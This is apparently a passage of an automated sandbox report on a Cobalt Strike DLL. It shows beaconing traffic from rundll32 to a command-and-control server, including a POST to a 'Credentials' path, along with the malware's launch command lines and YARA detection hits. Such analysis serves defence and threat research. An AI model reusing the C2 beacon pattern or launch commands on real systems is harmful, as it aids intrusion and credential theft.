              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=xSBMbWBJOMNiFcZsL65bpJJn-k8yfaPyRcKF3-DDQ9m2ysocVbe89ocfIe5aXQ6h6LxxhxuG32nApS2HuOVFDt-JsOrx4HLDeT6K7EBbgjvv6Kl58a1ql80azKRaZQCcMH9oeoUsusdb5i9rMr89xXSREEd4PribVZS3gRozk9yrfQWN
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:56.531440973 CEST7119INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:56 GMT
              Server: cloudflare
              Content-Length: 2458
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              72192.168.2.749892185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:20:57.174088955 CEST7122OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=V7L_yNtK_RjAmKwP7UbPIAx-UDb_TjYfzINQKTBsvwe3MmIcq-FLgJgYPi73ecrNLx4XZnFmSLGLxv8XmNWCoFgl2goz52FyfACIJjeEnI6neAcSw5nk-iULjhQECL0sp40mhD5o6PVwW4lUeH8Qd6YizM3Pq8DausWAr_MjiiVR_YGE
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:57.201987028 CEST7123INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:57 GMT
              Server: cloudflare
              Content-Length: 2223
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              73192.168.2.749893185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:20:58.340501070 CEST7126OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=LM835qE4iPa4C-BZBtQQmfqPwb9hPdrF0-HUYXbPNDiDbMypIAQauXGOmsEhpFqCU4qy0gNRktZhpbP8mgPfefzEMapD7CCUs-YXH-S_geeaIrdNXq4CSJeBPqjgsfLxWWFvnxtZDow5_8aR1XlycleBdvTNzf8OmLD8SxkAiPpOYlHJ
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:58.368211031 CEST7126INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:58 GMT
              Server: cloudflare
              Content-Length: 2415
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              74192.168.2.749894185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:21:02.789854050 CEST7130OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=GfTawrydrmy-wVDD83rNC06zbODuqTVdmRYTcDwX1XZqHlyziWMqWVvLt0GGiZgONGjnKMdSScYccbsoZDHToQNdJkUtNORspeocQ5yPFJQzPD_WLXn8OBHOWguGsZYz7Kv-1Vn4LGiHMrnE7muraqhFhuik6i40iUAhLsbnBXN3qZMi
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:21:02.831270933 CEST7130INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:21:02 GMT
              Server: cloudflare
              Content-Length: 2394
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              75192.168.2.749895185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:21:06.000195980 CEST7134OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=aE_wOOS38uj_ZaP_0rvA0DODX8bAsznv835f2Q-RsPeIz23slBxEcKflMd7IhMU9EOMYlk6bR0G0O_DnpyiNUGfY1foMGm6CQ_2H1gh5k36YhQji_GTrChr2geQ79bLcmHApdAGV5wVPpoakR4Ifh5nfwz3wVs8qhTiPX8zehdVuAI50
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:21:06.028147936 CEST7134INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:21:06 GMT
              Server: cloudflare
              Content-Length: 2202
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              76192.168.2.749896185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:21:08.004734039 CEST7137OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=rYKwfiB1D245RmfBh5mXAXvCRifgcF1dUqxT-feCs6ACIUsxoUmdIfDDHVmg6d0a0sc1SoIcFU7g6DRkG05Y4X2JtjLCoacMMquQh2XyBn8bbzDV3-OF0BbMuTBh_HVp2CzoB5oUiRS4skEJVDT16tbM8WxMgHiWGf1705hND2LPL9ZR
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:21:08.035444021 CEST7138INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:21:08 GMT
              Server: cloudflare
              Content-Length: 2415
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              77192.168.2.749897185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:21:09.573805094 CEST7141OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=tbLArRDbtAMSh0qsXzzXZOL1do9C7y8yNVAJH5BRzxnGWEbcJSUwNveNrS4qz4JhmC79R2sUU6mwN6FHyHfJzq8bPCqBcv4DCawGLDDJDvufeiW5gT_mV72IQGQq94xcQO3kuvW-NgcrdKOrQi2xBQQDnIcIrDRbJQY7QWqhHxzb74lN
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:21:09.602147102 CEST7142INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:21:09 GMT
              Server: cloudflare
              Content-Length: 2330
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              8192.168.2.749749185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:18:19.820122004 CEST1761OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=7XJRhGCF7pR5toY7x2l2-zsyp92ggLynElyyA7dyUlpC0arL4bl827Az_KPgGTzgkjfUsMLs9LSgGNWeW765Gz15V8iCUUb2cltxfSUC54Vbn9EvnxNkKlY8WMohDJSTmNwJ_drkaO74QqDzFMQUEJY8EJYMcJlsWQ2aKdi97piP3zer
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:19.848558903 CEST1762INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:19 GMT
              Server: cloudflare
              Content-Length: 2266
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              9192.168.2.749751185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:18:20.008554935 CEST1765OUTPOST /explode/Credentials/6R1C1XVKLMP?_NDUSZDOG=BEEBAOMDCBHADPPFCEHFDNPACA HTTP/1.1
              Accept: image/*, application/xml, text/html
              Accept-Language: es-pe
              Accept-Encoding: gzip, *
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Content-Length: 11216
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:20.036293983 CEST1776INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:20 GMT
              Server: cloudflare
              Content-Length: 2191
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: plain/text; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Code Manipulations

              Statistics

              Behavior

              Click to jump to process

              System Behavior

              Analysis Process: loaddll64.exe PID: 2760 Parent PID: 5848

              General

              Start time:20:18:08
              Start date:25/09/2021
              Path:C:\Windows\System32\loaddll64.exe
              Wow64 process (32bit):false
              Commandline:loaddll64.exe 'C:\Users\user\Desktop\GnGmRmwtZJjkTEt.dll'
              Imagebase:0x7ff6f8d30000
              File size:140288 bytes
              MD5 hash:A84133CCB118CF35D49A423CD836D0EF
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Analysis Process: cmd.exe PID: 4840 Parent PID: 2760

              General

              Start time:20:18:09
              Start date:25/09/2021
              Path:C:\Windows\System32\cmd.exe
              Wow64 process (32bit):false
              Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\GnGmRmwtZJjkTEt.dll',#1
              Imagebase:0x7ff7bf140000
              File size:273920 bytes
              MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Analysis Process: rundll32.exe PID: 5868 Parent PID: 2760

              General

              Start time:20:18:09
              Start date:25/09/2021
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:rundll32.exe C:\Users\user\Desktop\GnGmRmwtZJjkTEt.dll,gSDCSXjfiSV
              Imagebase:0x7ff6b8550000
              File size:69632 bytes
              MD5 hash:73C519F050C20580F8A62C849D49215A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: CobaltStrike_Sleep_Decoder_Indicator, Description: Detects CobaltStrike sleep_mask decoder, Source: 00000003.00000002.640651466.0000019BD8300000.00000020.00000001.sdmp, Author: yara@s3c.za.net
              • Rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator, Description: Detects CobaltStrike C2 encoded profile configuration, Source: 00000003.00000003.243495836.0000019BD7F00000.00000040.00000001.sdmp, Author: yara@s3c.za.net
              • Rule: CobaltStrike_MZ_Launcher, Description: Detects CobaltStrike MZ header ReflectiveLoader launcher, Source: 00000003.00000003.243495836.0000019BD7F00000.00000040.00000001.sdmp, Author: yara@s3c.za.net
              • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000003.00000003.243495836.0000019BD7F00000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000003.00000003.243495836.0000019BD7F00000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Cobaltbaltstrike_RAW_Payload_http_stager_x64, Description: Detects CobaltStrike payloads, Source: 00000003.00000002.636991024.000000006BC03000.00000004.00020000.sdmp, Author: Avast Threat Intel Team
              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000003.00000002.636991024.000000006BC03000.00000004.00020000.sdmp, Author: Joe Security
              • Rule: Cobaltbaltstrike_RAW_Payload_http_stager_x64, Description: Detects CobaltStrike payloads, Source: 00000003.00000002.640457266.0000019BD7B00000.00000020.00000001.sdmp, Author: Avast Threat Intel Team
              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000003.00000002.640457266.0000019BD7B00000.00000020.00000001.sdmp, Author: Joe Security
              Reputation:high

              Analysis Process: rundll32.exe PID: 3012 Parent PID: 4840

              General

              Start time:20:18:09
              Start date:25/09/2021
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:rundll32.exe 'C:\Users\user\Desktop\GnGmRmwtZJjkTEt.dll',#1
              Imagebase:0x7ff6b8550000
              File size:69632 bytes
              MD5 hash:73C519F050C20580F8A62C849D49215A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Cobaltbaltstrike_RAW_Payload_http_stager_x64, Description: Detects CobaltStrike payloads, Source: 00000004.00000002.636959360.000000006BC03000.00000004.00020000.sdmp, Author: Avast Threat Intel Team
              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000004.00000002.636959360.000000006BC03000.00000004.00020000.sdmp, Author: Joe Security
              • Rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator, Description: Detects CobaltStrike C2 encoded profile configuration, Source: 00000004.00000003.244001600.0000012256A00000.00000040.00000001.sdmp, Author: yara@s3c.za.net
              • Rule: CobaltStrike_MZ_Launcher, Description: Detects CobaltStrike MZ header ReflectiveLoader launcher, Source: 00000004.00000003.244001600.0000012256A00000.00000040.00000001.sdmp, Author: yara@s3c.za.net
              • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000004.00000003.244001600.0000012256A00000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000004.00000003.244001600.0000012256A00000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Cobaltbaltstrike_RAW_Payload_http_stager_x64, Description: Detects CobaltStrike payloads, Source: 00000004.00000002.641196073.0000012256620000.00000020.00000001.sdmp, Author: Avast Threat Intel Team
              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000004.00000002.641196073.0000012256620000.00000020.00000001.sdmp, Author: Joe Security
              • Rule: CobaltStrike_Sleep_Decoder_Indicator, Description: Detects CobaltStrike sleep_mask decoder, Source: 00000004.00000002.641582274.0000012256E00000.00000020.00000001.sdmp, Author: yara@s3c.za.net
              Reputation:high

              Analysis Process: rundll32.exe PID: 1340 Parent PID: 2760

              General

              Start time:20:18:13
              Start date:25/09/2021
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:rundll32.exe 'C:\Users\user\Desktop\GnGmRmwtZJjkTEt.dll',gSDCSXjfiSV
              Imagebase:0x7ff6b8550000
              File size:69632 bytes
              MD5 hash:73C519F050C20580F8A62C849D49215A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Cobaltbaltstrike_RAW_Payload_http_stager_x64, Description: Detects CobaltStrike payloads, Source: 00000005.00000002.636963833.000000006BC03000.00000004.00020000.sdmp, Author: Avast Threat Intel Team
              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000005.00000002.636963833.000000006BC03000.00000004.00020000.sdmp, Author: Joe Security
              • Rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator, Description: Detects CobaltStrike C2 encoded profile configuration, Source: 00000005.00000003.251028132.00000243BE620000.00000040.00000001.sdmp, Author: yara@s3c.za.net
              • Rule: CobaltStrike_MZ_Launcher, Description: Detects CobaltStrike MZ header ReflectiveLoader launcher, Source: 00000005.00000003.251028132.00000243BE620000.00000040.00000001.sdmp, Author: yara@s3c.za.net
              • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000005.00000003.251028132.00000243BE620000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000005.00000003.251028132.00000243BE620000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: Cobaltbaltstrike_RAW_Payload_http_stager_x64, Description: Detects CobaltStrike payloads, Source: 00000005.00000002.641133563.00000243BE250000.00000020.00000001.sdmp, Author: Avast Threat Intel Team
              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000005.00000002.641133563.00000243BE250000.00000020.00000001.sdmp, Author: Joe Security
              • Rule: CobaltStrike_Sleep_Decoder_Indicator, Description: Detects CobaltStrike sleep_mask decoder, Source: 00000005.00000002.641411926.00000243BEA20000.00000020.00000001.sdmp, Author: yara@s3c.za.net
              Reputation:high

              Disassembly

              Code Analysis

              Reset < >